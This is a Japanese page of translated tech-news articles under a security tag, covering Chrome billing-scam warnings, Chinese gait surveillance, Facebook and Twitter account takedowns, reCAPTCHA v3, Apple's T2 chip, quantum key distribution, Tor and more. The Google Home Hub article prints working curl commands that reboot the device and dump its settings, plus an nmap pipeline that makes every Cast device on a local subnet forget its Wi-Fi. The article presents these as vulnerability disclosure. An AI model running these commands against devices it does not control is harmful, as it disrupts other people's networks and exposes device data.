タグ: セキュリティ

Chromeにモバイルの会員登録詐欺(キャリア課金!)を防ぐ警告機能が登場

Googleが今日(米国時間11/8)、近くChromeブラウザーにモバイルの会員登録詐欺を防ぐ機能を設ける、と発表した。それは、ユーザーに電話番号を入力するよう求め、それに応じると勝手に月額の会費が発生し、それがキャリアへの毎月の支払額に自動的に含まれてしまう。12月のChrome 71より、そのサイトが、モバイルの会員登録であることを明示しない場合、警告をポップアップする。

ユーザーに会員登録をさせようとするサイトが一律にこの仕組みに引っかからないようにするために、Googleはデベロッパーのためのベストプラクティスを今日公開した。それによると一般的にデベロッパーは、課金情報をユーザーの目につきやすい場所・形で表示しなければならない。具体的な金額と料金体系も、表示すること。

その情報がない場合、Chromeはフルページの目立つ警告を表示する。それがユーザーにとって問題のないサイトなら、先へ進めばよい。Googleは警告表示をする前にSearch Consoleで詐欺の可能性をWebマスターに通知するが、もちろんそれが擬陽性である場合もある。

この新しい機能はモバイルとデスクトップの両方で提供され、AndroidのWebView(アプリ内Webブラウザー)にも表示される。

[原文へ]
(翻訳:iwatani(a.k.a. hiwa

中国の警察に歩行特徴認識テクノロジー導入――50m離れて後ろ向きでも個人を特定可能

中国には世界中でいちばたくさんのCCTVカメラが設置されている。 1億7000万台のビデオカメラのネットワークが存在するということだ。中国の警察はGoogle Glass的なスマートメガネを装着して人混みの中から容疑者を特定している。しかもこの恐るべき監視能力がさらにレベルアップされた。新しいテクノロジーは歩き方や体格から特徴を抽出して人物を特定できる。

APの報道によれば、この歩行特徴認識(gait recognition)テクノロジーはすでに北京と上海の警察で使用されており、カメラの映像が後ろ向きだったり顔が見えなかったりしても個人を特定できるという。

開発したのは中国のAIスタートアップ、Watrix(银河水滴科技)で、同社は最近のラウンドで1億4500万ドルの資金を調達し、システムのアップグレードを図っている。 ファウンダー、CEOの黃永禎(Huang Yongzhen)は APのインタビューに対し、このシステムは50メートルの距離から個人を特定できると答えた。既存の顔認識テクノロジーと組み合わせることにより、繁華な地区における警察の監視能力は大幅にアップするものとみられる。

捜査当局が犯罪者を発見するのに役立つことは言うまでもないが、残念ながらこのテクノロジーのインパクトはそれにとどまらない。中国ではこれまでもハイテク監視テクノロジーが民衆の弾圧のような邪悪な目的で利用されてきたことが記録されている。

ことに最近、中国政府はデータベースと顔認識テクノロジーを少数民族の統制のために利用しているとして非難されている。 新疆地域に住むムスリムのウィグル人1000万人は自宅や勤務先など特定の場所から出るとただちに当局によって監視されるとBloombergは報じている

中国政府は新疆で100万人のムスリムを「再教育施設」に収容しているとして強く批判されている。新疆の諸都市は地理的に北京よりバグダッドに近く、民族、宗教間の対立による不安定な情勢がしばしば伝えられてきた。中国政府が最新の個人認識テクノロジーをこの地区に投入してきたことにはこうした背景がある。歩行認識テクノロジーがが新疆にも導入されるかどうか、現時点では情報がない。しかし今はまだだとしても近い将来導入されるのではないかという推測はできる。

原文へ

滑川海彦@Facebook Google+

アメリカの中間選挙まであと数時間、Facebookは‘組織的な不正行為’で100あまりのアカウントを削除

Facebookは、30のアカウントと85のInstagramアカウントを同社の言う“組織的な不正行為”により停止した。

Facebookのサイバーセキュリティ担当Nathaniel Gleicherが、月曜日(米国時間11/5)の夜晩くに最新の発見を公表した。

“日曜日の夜、アメリカの法執行当局が、彼らが最近発見した外国起源と思われるオンラインのアクティビティに関してわれわれに接触してきた”、とGleicherは言う。その法執行機関が何であるか、は言っていない。“われわれは直ちにこれらのアカウントをブロックし、目下その詳細を調査中である”。

同社は、あまり多くをシェアすることなく、ただ、“そのアカウントのFacebook Pagesはロシア語またはフランス語のようであり、Instagramアカウントは英語が多かったようだ。それらの一部はセレブを話題にし、ほかは政治的な議論がその内容だった”、とだけ言っている。

Gleicherの記事は、同社が“調査がさらに進んだ段階でさらに詳細を公表するつもり”だが、しかし、この前閉鎖したイラン関連の不正アカウントも、その時点では名前等を公表できる、と誓っている。

さらに問い合わせたが、Facebookのスポークスパーソンは何もコメントしなかった。

この最新のアカウント削除は、火曜日に行われるアメリカの中間選挙の直前、というタイミングだ。火曜日(米国時間11/6)には何百万人ものアメリカ人が投票により新しい国会議員と州知事を選ぶ。この選挙では、大統領就任2年目となるトランプ大統領とその政権の評価が分かる、と言われている。その大統領選は、ロシアの諜報機関による、彼の民主党対立候補に関する不正な情報や悪口の拡散という、裏に国家が控える斉一的な努力の最中(さなか)に行われた。

月曜日の朝になってやっと、コロンビア大学のTow Center for Digital Journalism(デジタルジャーナリズムのためのTowセンター)が、選挙妨害が今でもまだFacebookの大きな問題であり続けている、という報告書を発表した。その報告書は、同社の高級幹部たちはこれまで何度も繰り返して、偽のニュースや不正情報と戦うためにできるかぎりのことをやっている、と約束してきたが、その効果は現れていない、と言っている。

[Facebookはイラン起源の‘組織的な身元詐称行為’でページやアカウントをさらに削除]

Facebook takes down more ‘coordinated inauthentic behavior’ linked to Iran

[原文へ]
(翻訳:iwatani(a.k.a. hiwa

民主党支持者に投票棄権を呼びかける数千のTwitterアカウントを削除、選挙妨害の大海の一滴

Twitterは、来週の選挙で有権者に投票しないよう呼びかけている、何千もの自動的に作られたアカウントを削除した。

同社によると、9月から10月にかけては、最初に民主党のスタッフが気づいた1万近くのアカウントを削除した。

Twitterの公式の声明では、“自動化されたやり方で偽情報を共有する試みに関与している一連のアカウントを、弊社のポリシーへの違反として削除した。われわれはこれを、迅速かつその始原において停止した”、と言っている。しかし削除したアカウントの例示はなく、偽情報の投稿者の名前の発表もない。

それらのアカウントは民主党員を名乗り、都市部など厚い有権者層に、家にとどまり投票しないよう説得を試みている。このニュースを最初に報じたロイターによるとそれは、重要な選挙区で選挙結果を操作するためだ。

民主党の全国委員会のスポークスパーソンは、勤務時間外を理由にコメントを断った。

今回のアカウント削除は大海の一滴であり、Twitterはもっと大きな脅威に直面している。今年の前半には、テロリストのコンテンツを共有し宣伝している120万ものアカウントを削除した。そして5月だけでも、毎週1000万近くの、自動的に送られる悪質なメッセージを削除した。

Twitterの月間アクティブユーザーは7月の決算報告で3億3500万だ。

しかし同社は、同社のルールに違反したり、偽情報や不正なニュースを拡散しているコンテンツをもっと先見的に削除するための策を講じていないとして、議員たちから批判されている。あと数日でアメリカの中間選挙だが、この最新の削除努力は、Twitterが悪質アカウントを自動的に削除しなかった、という懸念をさらに広めるだろう。

偽民主党員に関するロイターの報道を受けてTwitterのサイト健全性担当Yoel Rothがツイートのスレッドで曰く、“ボットの検出に関する公開されている研究は欠陥が多く、その多くはボットを、確実性ではなく確率に基づいて検出する。なぜならば、公開されていない内部的アカウントデータを見られるのは、彼ら研究者ではなくTwitterだけだからだ”。

選挙が目前に迫っていてもTwitterには、偽情報の拡散に関する厳格なポリシーが、Facebookと違ってない。Facebookは最近、不正で人を惑わすような情報で有権者を押さえつけようとするコンテンツを禁じた

対してTwitterは昨年、その“オープンでリアルタイムな性質”が、“あらゆるタイプの偽情報の拡散に対する強力な対抗策だ”、と主張した。しかし研究者たちは、そのやり方に対して批判的だ。先月発表された研究は、2016年の大統領選の間にアクティブだった70万あまりのアカウントが、今もまだ健在であり、毎日100万のツイートをプッシュしていることを見つけた。

今年の選挙に関してTwitterのスポークスパーソンは、“各州の選挙管理職員と国土安全保障省および二大政党の選挙参謀たちが、われわれのポリシーの強力な施行と、われわれのサービスの健全な会話性の保護を支援できるために、オープンなコミュニケーションラインと、直接的で容易な活動拡大経路を確立した”、と言っている。

Thousands of Twitter accounts that spread fake news during the 2016 election are still active today, say researchers(未訳)

[原文へ]
(翻訳:iwatani(a.k.a. hiwa

GoogleのHome Hubがたった1行のコードで煉瓦になる(文鎮になる)

セキュリティの普及活動家であるJerry Gamblinがポストした、主にXMLの行から成るコードは、Google Home Hubから容易に情報を取り出し、ときには一時的にそのデバイスを動かなくしてしまう。

Home Hubは要するに、Androidタブレットにスピーカーをくっつけた製品で、室内で使うGoogle Assistantデバイスとして設計されている。それは近くのWi-Fiアクセスポイントを見つけ、ユーザーはそのどれかに接続し、他のデバイスからビデオや写真を受信したり、リモートのコマンドを受け付けたりする。ビデオを受信するときには自分のPINを送信するし、また受け取るコマンドの中にはコマンドラインのクイックリブートもありえる。

問題のコマンドは、コマンドラインからの簡単なURL呼び出しで、明らかにセットアッププロセスの一部だ。ご自分で試したい人は’hub’のところをHome HubのローカルなIPアドレスに置換するとよい:

curl -Lv -H Content-Type:application/json --data-raw '{"params":"now"}' http://hub:8008/setup/reboot

[ぼくはIoTのセキュリティのエキスパートではないが、不正なcurlコマンドでGoogleのHome Hubをリブートできるのはおかしいよね。]

これも1行のコード(curlコマンド)だが、マイクロサービスの数などの情報を暴露する:

$ curl -s http://hub:8008/setup/eureka_info | jq
{
"bssid": "cc:be:59:8c:11:8b",
"build_version": "136769",
"cast_build_revision": "1.35.136769",
"closed_caption": {},
"connected": true,
"ethernet_connected": false,
"has_update": false,
"hotspot_bssid": "FA:8F:CA:9C:AA:11",
"ip_address": "192.168.1.1",
"locale": "en-US",
"location": {
"country_code": "US",
"latitude": 255,
"longitude": 255
},
"mac_address": "11:A1:1A:11:AA:11",
"name": "Hub Display",
"noise_level": -94,
"opencast_pin_code": "1111",
"opt_in": {
"crash": true,
"opencast": true,
"stats": true
},
"public_key": "Removed",
"release_track": "stable-channel",
"setup_state": 60,
"setup_stats": {
"historically_succeeded": true,
"num_check_connectivity": 0,
"num_connect_wifi": 0,
"num_connected_wifi_not_saved": 0,
"num_initial_eureka_info": 0,
"num_obtain_ip": 0
},
"signal_level": -60,
"ssdp_udn": "11111111-adac-2b60-2102-11111aa111a",
"ssid": "SSID",
"time_format": 2,
"timezone": "America/Chicago",
"tos_accepted": true,
"uma_client_id": "1111a111-8404-437a-87f4-1a1111111a1a",
"uptime": 25244.52,
"version": 9,
"wpa_configured": true,
"wpa_id": 0,
"wpa_state": 10
}

そして下のnmap呼び出しは、ローカルなネットワーク上のすべてのデバイスが自分のWi-Fiを忘れてしまうので、もう一度セットアップしなければならない:

nmap --open -p 8008 192.168.1.0/24 | awk '/is up/ {print up}; {gsub (/(|)/,""); up = $NF}' | xargs -I % curl -Lv -H Content-Type:application/json --data-raw '{ "wpa_id": 0 }' http://%:8008/setup/forget_wifi

Gamblinも言っているが、これらのセキュリティホールは壊滅的ではないが要注意だ。これらのコマンドやツールを不正に実行できてしまうこと自体、よく言えば怠慢だし、悪く言えば危険だ。彼の指摘によると、このオープンなエンドポイントは何年も前からいろんなGoogleデバイスにある。だからこれはコードベースの正常な一部であり、Googleによるいたずらではない。

ここには、重大なものは何もないし、Home Hubが重要な医療機器を制御することもない。でも、このプラットホームを使ってるデバイスにセキュリティの欠陥があることは、知っておいて損はない。この場合はコマンドの不正実行やシステムの盗用だ。しかし今日はGrandpaの超複雑な写真フレームをリブートできるだけだが、明日になると誰かが、うちのおじいちゃんの酸素濃縮器をリブートするかもしれない。

[原文へ]
(翻訳:iwatani(a.k.a. hiwa

AppleのセキュリティチップT2はMacBookのマイクロフォンからの盗聴をハードウェアレベルで不可能に

Appleの最新のMacBookは、マイクロフォンからの盗聴がさらに困難になっている。

この前発売されたMacBook Proから、今日のMacBook Airに至るまで、最新のMacBookには、セキュリティチップT2が内蔵され、それが暗号鍵やストレージ、指紋データ、そしてセキュアブート機能を護る。

このチップのことはこれまでほとんど知られていなかったが、発表されたばかりのセキュリティガイドによると、このチップにはマイクロフォンとデバイス本体との接続をハードウェア的に切る機能があり、本体の蓋を閉めると必ずそれが作動する。

ガイドにはこう書かれている: “この断線機能はハードウェアのみで実装されているから、いかなるソフトウェアからも操作できない。macOSのroot特権やカーネル特権、それにT2チップ上のソフトウェアですら、蓋が閉められているときマイクロフォンに関与することはできない”。

ただし、カメラは切断されない。“蓋が閉じていると視界が完全に遮(さえぎ)られるから”だ。

Appleによると、この新しい機能はMacに“これまでなかった”高いレベルのセキュリティを賦与する。Macはマルウェアに感染しない、というストレートな言い方はしていないが…。

Webカメラを利用するハッカーの脅威は何年も前からの現実で、それはリモートアドミニストレーションツール(“RATs”)を使ってのぞき屋たちが、ラップトップのカメラからリモートでターゲットをスパイする。そのため、Webカメラのレンズにポストイットを貼ることが流行(はや)った。

AppleのWebカメラはライトがハードウェアに接続しているので、ユーザーが知らない間に(ソフトウェアが勝手に)Webカメラを起動することは不可能、と信じられていた。Macには、Webカメラののぞき攻撃に対する十分な免疫がある、と思われていた。しかし昨年、セキュリティ研究家のPatrick Wardleが、この神話を破壊したFruitflyマルウェアを発見した。

そのパラノイアは神話ではなく現実だ。イギリス政府の諜報機関GCHQは、その“Optic Nerve”プログラムの一環として長年、Webカメラの悪用を調査した。FacebookのCEO Mark Zuckerbergでさえ、自分のWebカメラとMacBookのマイクロフォンにガムテープを貼っていると報道された。ただし、マイクロフォンが拾う音を数枚のガムテープで遮断することはできない。

Webカメラやマイクロフォンが作動したらアラートするWardeのOversightのようなツールはあるけど、高度なマルウェアがこっそりとMacBookのマイクを使って環境音を聞き取ることを、防げるものはほとんどない。

でも蓋が閉められるときマイクロフォンをMacBookのハードウェアから切断したら、その眠っているデバイスがユーザーをスパイすることは、きわめて難しい。

Long-awaited brand-new MacBook Air finally gets retina display and Touch ID(未訳)

Apple Fall Event 2018

画像クレジット: Apple, クリエイティブコモンズND 4.0ライセンスによる

[原文へ]
(翻訳:iwatani(a.k.a. hiwa

reCAPTCHA v3 をご紹介します。Bot の活動を阻止する新しい方法

本日は、ユーザーが操作することなくウェブサイトへの不正なトラフィックを検出できる最新の API、reCAPTCHA v3 についてご紹介します。確認用画像を表示するキャプチャとは異なり、reCAPTCHA v3 ではスコアが返されます。サイト所有者は、このスコアに基づいてウェブサイトに最適なアクションを選択できます。

スムーズなユーザー エクスペリエンス

ここ 10 年の間、reCAPTCHA のテクノロジーは常に進化を遂げてきました。reCAPTCHA v1 では、歪められた文字を読み取ってボックスに入力し、確認用画像のテストをパスすることがすべてのユーザーに求められていました。その後、ユーザー エクスペリエンスとセキュリティの両方を改善するために reCAPTCHA v2 が導入されました。reCAPTCHA v2 では、リクエストが人間によるものなのか、それとも bot によるものなのかを判別するために、他にも数多くの要素が使用されるようになりました。これにより、reCAPTCHA の確認用画像は、不正行為の検出においてメインの機能ではなく二次的な機能として利用されるようになり、ユーザーの約半数が 1 回のクリックでパスできるようになりました。そして今回、reCAPTCHA v3 により、人間と bot を判別する方法が根本的に変わります。reCAPTCHA v3 では、サイトに対するアクティビティがどの程度不審であるかを示すスコアが返され、確認用画像によってユーザーを妨げる必要がなくなります。バックグラウンドで適応型リスク分析が実行されるため、ユーザーにはスムーズなエクスペリエンスを提供しながら、不審なトラフィックがあった場合には通知を受け取れます。

「アクション」を使ったより正確な bot 検出

reCAPTCHA v3 では、「アクション」タグという新しいコンセプトが導入されています。このタグを使用することで、ユーザーの一連の操作における主要なステップを定義でき、コンテキストをふまえたリスク分析が reCAPTCHA によって実現します。reCAPTCHA v3 はユーザーの操作を妨げることがないため、複数のページに追加することをおすすめします。複数のページに追加することで、適応型リスク分析エンジンで複数のページにまたがるアクティビティを分析し、より正確に攻撃パターンを特定できるようになります。reCAPTCHA の管理コンソールでは、reCAPTCHA スコアの分布状況に関する全概要を確認でき、サイトの上位 10 件のアクションに関する統計情報も確認できます。これにより、どのページが bot の標的にされているかを正確に把握し、そのページへのトラフィックがどの程度不審なのかについても確認できます。

サイトに適した方法で bot に対処する

reCAPTCHA v3 のもう 1 つの大きな利点は、スパムや不正行為を防ぐ方法をウェブサイトに合わせて柔軟に選べるという点です。これまでの reCAPTCHA システムでは、多くの場合、いつ、どのようなキャプチャをユーザーに提示するかが決められており、限定的にしかウェブサイトのユーザー エクスペリエンスに関与できませんでした。reCAPTCHA v3 では、操作がどの程度不審であるかを示すスコアが返され、そのスコアを 3 つの方法で活用できます。1 つ目はしきい値を設定し、ユーザーをパスさせるか、さらに確認が必要かを判断する方法です。追加の確認手順としては 2 段階認証プロセスや電話での確認などを使用できます。2 つ目は、reCAPTCHA が利用できない要素(ユーザー プロファイルやトランザクション履歴など)とスコアを組み合わせる方法です。3 つ目は、不正行為に対抗するための機械学習モデルのトレーニングにおいて、reCAPTCHA のスコアを指標の 1 つとして活用する方法です。このように、新しいバージョンでは新たな方法を利用できます。さまざまなタイプのトラフィックに応じてアクションをカスタマイズすることで、ウェブサイトのニーズに基づいてサイトを bot から保護し、ユーザー エクスペリエンスを改善できます。

reCAPTCHA v3 を利用することで、ユーザーの操作を妨げることなくサイトを保護し、危険性の高い状況においてどのように対処すべきかをさらに正確に判断できます。今後も Google では、攻撃者に先んじて、インターネットを快適に、そして安全に使えるように取り組んでまいります。

reCAPTCHA v3 の利用に関心をお持ちの場合は、デベロッパー サイトで詳細をご確認ください。

Posted by Wei Liu, Google Product Manager
Original version: Official Google Webmaster Central Blog: Introducing reCAPTCHA v3: the new way to stop bots

暗号通貨ウォレットの「Blockchain」、Ledgerと提携してハードウェア・ウォレットを発売

ブロックチェーンのスタートアップ、”Blockchain“が今後数ヶ月の shared its 計画を発表した。同社はLedgerと提携してハードウェア・ウォレットを発売する。またBlockchainは新しい取引プラットフォームとしてSwap by Blockchainの提供を開始する——このプラットフォームは数ある交換所の中から最高の取引条件を見つけるので、ユーザーは自分のBlockchainアカウントで直接適正価格でトークンを交換できる。

Blockchainは現在もっとも成功している暗号通貨ウォレットのひとつだ。同社はBitcoin向けのソフトウェア・ウォレットでユーザー基盤を築き、今やEtherumとBitcoin Cashにも拡大している。

伝統的交換所と異なり、Blockchainではユーザーがプライベートキーを管理する。Blockchainはユーザーのトークンをアクセスできないので、仮にBlockchainがハックされてもハッカーがユーザーのウォレットを空にすることはない。現在Blockchainは3000万個のウォレットを管理しており、過去2年間で2000億ドル以上の取引を処理した。

しかしソフトウェア・ウォレットはハードウェア・ウォレットほど堅牢ではない。世の中には無数のフィッシングサイトや詐欺師が人々のプライベートキーを盗もうと狙っている。だからBlockchainは独自のハードウェア・ウォレット、のようなものを発売することになった。

同社はフランスのスタートアップ、 Ledgerと提携してBlockchain Lockboxを発売する。見た目はLedger Nano Sとまったく同じでBlockchainのロゴがついている。中にはBlockchainのファームウェアが入っていてBlockchainのウォレットと連動する。

Ledger自身のアプリと同じく、ハードウェア・ウォレットをパソコンと繋がなくてもスマートフォンやウェブで残高を確認できる。ただし、取引を処理するためにはパソコンに差し込んでBlockchain Lockbox自身で取引を認証する必要がある。

今あるBlockchainウォレットとBlockchain Lockboxにつながったウォレットがどういう関係になるのか気になるところだ。Lockboxは一種の長期保管庫として働き、標準のBlockchainウォレットには少額のコインを保存しておき日常の取引に使用する。

Swapは、Blockchainが独自に作っている取引システム商品だ。独立した交換所になるのではなく、同社は複数の交換所システムと統合する計画だ。最終的にBlockchainは、非中央集権型取引プロトコルに対応して、交換所を経由することなくトークンの交換ができるようにすることを目指している。

Blockchain Lockboxの価格は99ドルで11月に発売予定。Blockchainはモバイル分野で非常に人気が高いので、Bluetoothやモバイルに対応したバージョンもでてくることを私は期待している。

[原文へ]

(翻訳:Nob Takahashi / facebook

Facebookはイラン起源の‘組織的な身元詐称行為’でページやアカウントをさらに削除

Facebookは、イラン起源の“組織的な身元詐称行為”として、82のページとグループとアカンウンとを削除した。

この大手ソーシャルネットワークは先週、その“身元詐称行為”を発見した。同社のサイバーセキュリティポリシーチーフNathaniel Gleicherがブログでそう述べている。彼によると、その作戦はもっぱらアメリカやイギリスの一般市民を名乗る(詐称する)もので、“人種問題や大統領の批判、移民問題など政治色の強い話題に関して投稿を行った”。同社によると、調査はまだ初期的段階だが、そのアクティビティをたどるとイランへ行き着いた。しかし犯人は特定できていない。

Facebookによると、イランの演技者たちのページのうち、少なくとも一つは、フォロワーが100万を超えた。Instagramからも、16のアカウントが削除された(内数)。

演技者たちはFacebookとInstagramで二つの広告に100ドル弱を、アメリカおよびカナダの通貨で支払った。広告の拡散により、Facebookユーザーへの彼らのリーチはさらに大きくなった。

同社はアカウント等削除の前にFBIとAtlanticに、彼らの発見を報告した、とGleicherは言っている。“発見から破壊への移行は1週間足らずで行われた”、という。

今回の削除に対するAtlantic Councilデジタル法科学研究所の分析によると、それらのアカウントは、“人びとのFacebookプラットホームからの離反ではなく、むしろエンゲージメントの強化をねらっている。そのために彼らは、さまざまなミームや、ビデオ、そして彼らの書き下ろしのコメントなどを駆使している”。同研究所によると、そのやり方には“効果があったようであり”、それらのポストは大量のシェアやリプライを受け取っている。

“外交政策に関するメッセージは、初期のイラン支持者たちのそれと歩調を合わせており、それは主に、中東に関するイラン政府側のストーリーを増幅している”、と分析は述べている。“人びとを分断させることを目的とするコンテンツへの彼らの注力は、ロシアの情報工作のやり方と非常によく似ているが、しかしイラン人による工作は保守よりもむしろリベラルをターゲットにしているようだ”。

Facebookは、アカウントとコンテンツの取り下げを、これまでも何回か行っている。たとえば8月には、セキュリティ企業FireEyeの支援のもとに、数百のアカウントとページを削除した。そのときも、イラン人による広範な人心誘導工作が見つかっている。これまでのFacebookのアカウント取り下げ努力は中間選挙をねらったニセ情報の拡散に関連していたが、イランの支援による作戦は、話題が多岐にわたっている。FireEyeによる当時(8月)の分析によると、イラン人たちは、“反サウジ、反イスラエル、パレスチナ人支持など、多様な話題を取り上げ、また、アメリカとイランの核合意など、イランに好意的なアメリカの政策を支持していた”。

Facebookのような大手テクノロジー企業は、2016年の大統領選に始まり、最近ではますます、国家が支援する演技者たちによるニセ情報や嘘のニュースの拡散を強力に取り締まるよう、議会からの圧力に直面している。

いちばん強く懸念されているのは、ロシア政府のために仕事をしているトロルたちの、ニセ情報の拡散による選挙操作だが、Facebook上のニセ情報拡散に関してはイランが、それとは別の強力なチームとして、台頭してきたのだ。

Facebook bans hundreds of clickbait farms for ‘coordinated inauthentic behavior’(未訳)

[原文へ]
(翻訳:iwatani(a.k.a. hiwa

ボストン―ワシントン間に量子暗号ネットワーク――Quantum Xchangeは年内に商用運用開始と発表

アメリカ東海岸に設置された全長800キロに及ぶ未使用の光ケーブル(ダーク・ファイバー)が本格的な商用量子暗号ネットワークとして活用される。計画では今年中に最初の顧客を受け入れるという。これにより量子暗号化によって暗号鍵を交換する商用サービスがアメリカで初めて運用されることになる。

メリーランド州ベセスダに本拠を置く量子コミュニケーション企業、Quantum Xchangeでは光通信大手のZayoとボストン・ワシントンDC間に暗号化通信を提供する契約を結んだ。このネットワークはボストンとワシントンの中間のニュージャージーに計算センターを置いているウォール・ストリートの多くの金融機関を当初の顧客のターゲットとしている。同社ではセキュリティーの高い通信手段を必要とする産業、ヘルスケアや公共インフラなどの企業もこのネットワークに参加することを期待している。

量子暗号化を利用したネットワークというのは新しいコンセプトではない。しかしテクノロジーの発達と現行の暗号システムに対する攻撃が繰り返され、安全性に懸念が生じていることの双方の理由から最近急速に注目を集めるようになっている。これは量子力学の理論と光子を利用して暗号鍵を交換する通信だ。理想的な状態では傍受により量子状態が変化するため、中間での盗聴が不可能となる。これは量子鍵配送(quantum key distribution)と呼ばれ、2点間を結ぶ暗号通信の次世代標準にとなる可能性が高いと見られている。

量子暗号は長年研究されてきたが、実用化可能なテクノロジーとなったのは比較的最近だ。近く量子暗号はデータセンター間や投票、支払、医療やなど高度なセキュリティーを必要とする通信に広く用いられることになるはずだ。量子暗号化は衛星通信でも利用可能だ。

ヨーロッパですでに小規模の量子暗号ネットワークの構築ですでにある程度の成功をみている。しかしQuantum XchangeのCEO、John Priscoによれば「各種の欠点」があり、アメリカにおける実用化のハードルとなってきたという。

Quantum Xchangeではトラステッド・ノード・テクノロジーを用いて、離れた2点間で鍵情報をやり取りする。これはネットワークを地理的に拡大することを容易にするという。

「ボストンにオフィスを置く企業、組織はワシントンDCに所在する相手方と安全にデータをやり取りできるようになる。将来は通信可能は範囲はさらに拡大される。光ケーブルはアメリカのいたるところにすでに敷設されている。アメリカ全土に安全な量子暗号通信を提供できるようわれわれはこうしたケーブルの買収を続けるつもりだ」とPrisicoは語った。

Priscoは「量子コンピューターが(現在の暗号方式を無効にするなど)攻撃兵器として実用化される前に量子暗号化を防衛手段として普及させることが決定的に重要だ」と付け加えた。

原文へ

滑川海彦@Facebook Google+

Mozillaは寄付の全額をTor Projectへのマッチングファンドに、Firefoxへの内蔵も開発中

Firefoxの生みの親であるMozillaが、その長年の盟友Tor Projectに再び目を向け、寄付の全額をTorの資金として提供することになった。オンラインのプライバシーを強化するオープンソースのプロジェクトTorは、今年も年末恒例の資金集め活動を開始したばかりだ。

TorはMozillaのサポートを今日(米国時間10/24)発表し、両者のパートナーシップがさらに続くことになった。昨年Torが調達した40万ドルあまりには、Mozillaの貢献も含まれている。これはテクノロジー系のスタートアップなら小額のシードラウンドにすぎない額だが、しかし2015年に政府の補助金への依存をやめて、資金源をクラウドファンディングに切り替えたTorにとっては、重要な収入源だ。

その2015年には、Torは330万ドルという記録的な額の寄付を受領した。それは2014年の250万ドルを上回り、今だにTorの年収の最高額だが、しかしその86%は国の補助金だった。それは、これまでで最高の額だが、Torの研究部長で社長のRoger Dingledineは当時、もっと頑張ってその比率を減らすべきだ、と認めていた。

Torは2016年以降の決算報告をまだ出していないが、昨年はプロダクトの面では大きな飛躍があった。Torは今でも、NSAの内部告発者Edward Snowdenが使ったことが、いちばんよく知られている。大きな飛躍というのは、今年の9月にAndroid用のモバイルブラウザーをローンチしたことと、同じ月にTor Browser 8.0をリリースしたことだ。後者は、これまででいちばん使いやすいTorのブラウザーで、Firefoxの2017 Quantumがベースだ。TorをFirefoxに内蔵するために、Firefoxとの密接な協働が続いた。Mozillaの元CEO Brendan Eichが作ったブラウザーBraveは、すでにTorを内蔵している

Torはブラウザーと、盗聴や監視のおそれを最小化するTorネットワーク本体のほかにも、いろんなプロジェクトを抱えている。Tor自身のデータによると、Torの推定ユーザー総数はおよそ200万人だ。

Tor Foundationで資金調達を担当しているSarah Stevensonはこう語る: “Tor Projectには大胆なミッションがある。ネットワークに対する侵入や制限に抗して世界中のインターネットユーザーのプライバシーと自由を守ることだ。でもそれは、一人ではできない”。

“エジプトやベネズエラなどの国には表現の自由に対する制約があり、オープンなWebへの自由なアクセスができない。また企業サイドでは、GoogleやAmazonなどが人びとのデータを濫用し、監視経済を肥大させている。反対意見を封じ込めるために、インターネットアクセスを全面的に禁じている国すらある”。

というわけで、Tor Projectの果敢なミッションに賛同される方は、同団体にここで寄付できる。

参考記事

[原文へ]
(翻訳:iwatani(a.k.a. hiwa

Cloudflareが来年$3.5BでIPOするようだ…近年はセキュリティスタートアップの稼ぎどき

Webサイトのパフォーマンスアップとセキュリティサービスを提供するCloudflareが、35億ドル以上という予想評価額でIPOを準備中のようだ。ロイターの記事によると、IPOの実行は2019年の前半を予定、幹事会社はGoldman Sachsだ。

今年は、セキュリティとプライバシーへの関心と需要の高まりにより、サイバーセキュリティ企業のIPOに最適の年と言われた。もう一社、IPOを準備していると言われるサイバーセキュリティのスタートアップがCrowdStrikeだ。同社は、同じくロイターによると、今年初めに30億ドルの評価額で2億ドルを調達した。CrowdStrikeも、IPOはGoldman Sachsが仕切るようだ。

Lee HollowayとMatthew Prince, そしてMichelle Zatlynが創業したCloudflareは、2010年のTechCrunch Disruptでローンチした〔創業は2009〕。Crunchbaseによると、その後同社は総額1億8210万ドルをNEA, Union Square Capital, Baidu, Microsoft, Qualcomm, およびcapitalG(Alphabetの投資ファンドで旧名Google Capital)などから調達した。最前の資金調達はシリーズDの1億1000万ドルで、それは2015年9月に発表され、Fidelity Investmentsがリードした。

CloudflareのサービスはWebサイトのロードを速くし、セキュリティの事故を防ぐ。同社のWebサイトによると、同社のデータセンターは現在154あまりあり、1000万あまりのドメインにサービスを提供している。同社は、“ひとりのインターネットユーザーが一週間平均でわが社のサービスに500回以上触れている”、と豪語している。

[原文へ]
(翻訳:iwatani(a.k.a. hiwa

HTCがブロックチェーンフォーンのアーリーアクセスをデベロッパーや暗号家に提供、興味深い‘分散セキュリティ’技術

何か月も前から話題になっていたHTCのブロックチェーンフォーンが、ついにやってきた。今日(米国時間10/22)ベルリンで行われた暗号通貨に関するカンファレンスで同社は、Exodus 1の初期的バージョンを、限られた量ではあるがこの製品の同社の公式サイトより、“世界中の暗号研究家とデベロッパーに提供する”、と発表した。

“初期的バージョン”と断っているのは、最終的な製品ではない、ということだ。12月発売とされているが、現状は数か月前の漠然とした状態からあまり変わっていない。でも、信ずる者は救われる、と言うし、この製品にものすごく好奇心のある方なら、一台手に入れることはできる。当然支払いは、BitcoinまたはEthereumだ。

このフォーンの画像はまだ乏しいが、でもこのデバイスはHTCの最新の旗艦機であるU12と共通のデザインを多く使ってるようだ。たとえば背面は、半透明のガラスだ。まあ、それはたぶん、良いことだ。こういう新奇なデバイスは、独自の技術を強調したいあまり、デザインなどはおろそかにされがちだ。でもここでは少なくとも、しっかりとした、まともなスマートフォンが基本にあることだけは、確かなようだ。

フォーン本体はAndroidだが、暗号通貨の鍵などを保存しなければならないから、セキュリティを強化している。今後はもちろん、あらゆるデータをこのフォーンが保存しなければならない。それに関しては、失ったデータに分散的にアクセスするという、おもしろいファンクションを内蔵している。

HTCは、あなたのフォーンが紛失または盗まれたり、あなたが鍵を忘れたときのために、ユニークなSocial Key Recovery(ソーシャルな鍵回復)メカニズムを開発した。それは、ハードウェア上で失われた鍵を回復する容易で安全な方法だ。また、そのおかげで、鍵をHTC自身がどこかの中央的な場所に、たとえ一時的たりとも、保存することが確実になくなる。鍵に対するいかなる権利も、常時あなたご自身がそのすべてを維持する。HTCはあなたに、いくつかの信頼できるコンタクトを選ばせ、そのそれぞれが鍵管理アプリをダウンロードする必要がある。するとあなたのシードワードは秘密の共有アルゴリズムによって分割され、その信頼されたコンタクトへ送られる。そして必要なときには、あなたのファンドへのアクセスを成功裡に再獲得できる。

